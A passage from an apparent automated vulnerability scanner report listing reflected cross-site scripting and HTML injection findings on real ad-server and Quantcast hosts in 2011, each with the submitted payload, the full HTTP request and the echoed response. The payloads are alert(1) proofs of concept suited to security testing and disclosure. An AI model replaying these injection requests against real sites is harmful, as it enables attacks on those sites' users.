<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafad"><script>alert(1)</script>58e3214e0d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64130"><script>alert(1)</script>4aff41005f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bda"><script>alert(1)</script>f0041c3072b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd55"><script>alert(1)</script>94b70172a07 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c48c"><script>alert(1)</script>9172a92def1 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1;adiframe=y">
...[SNIP]...

3.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd538"><script>alert(1)</script>254bcc5e869 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1;adiframe=y">
...[SNIP]...

3.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30ced"-alert(1)-"bb2604ed03b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=967562&30ced"-alert(1)-"bb2604ed03b=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/216/us/728x90/news?t=1297647385452&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 01:37:35 GMT
Pragma: no-cache
Content-Length: 4332
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?30ced"-alert(1)-"bb2604ed03b=1&Z=728x90&s=967562&_salt=1387362591";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

3.71. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 174ca<a>5a3271b9808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css174ca<a>5a3271b9808/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:29 GMT
Content-Length: 7756
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> css174ca<a>5a3271b9808 ie6.css</em>
...[SNIP]...

3.72. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed684"><a>a8da4324bd0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cssed684"><a>a8da4324bd0/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:28 GMT
Content-Length: 7762
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" cssed684"><a>a8da4324bd0 ie6.css" />
...[SNIP]...

3.73. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e344"><a>5df5c5f863a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie6.css4e344"><a>5df5c5f863a HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:32 GMT
Content-Length: 17486
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie6.css4e344"><a>5df5c5f863a" />
...[SNIP]...

3.74. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 445a4<a>bf5996418af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css445a4<a>bf5996418af/ie7.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:29 GMT
Content-Length: 7756
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> css445a4<a>bf5996418af ie7.css</em>
...[SNIP]...

3.75. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9344c"><a>2d187bf6a6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css9344c"><a>2d187bf6a6d/ie7.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:27 GMT
Content-Length: 7762
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css9344c"><a>2d187bf6a6d ie7.css" />
...[SNIP]...

3.76. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba29e"><a>ba8c2e9bbf8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie7.cssba29e"><a>ba8c2e9bbf8 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:33 GMT
Content-Length: 17486
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie7.cssba29e"><a>ba8c2e9bbf8" />
...[SNIP]...

3.77. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bbcb7<a>9b344e13caa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-cssbbcb7<a>9b344e13caa/screen-optimized.css?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:29 GMT
Connection: close
Content-Length: 7819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> dynamic-cssbbcb7<a>9b344e13caa screen-optimized.css</em>
...[SNIP]...

3.78. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e52f"><a>342afe3b0a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css2e52f"><a>342afe3b0a5/screen-optimized.css?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:27 GMT
Connection: close
Content-Length: 7825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css2e52f"><a>342afe3b0a5 screen-optimized.css" />
...[SNIP]...

3.79. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 598a7"><a>e5dcf033114 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.css598a7"><a>e5dcf033114?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
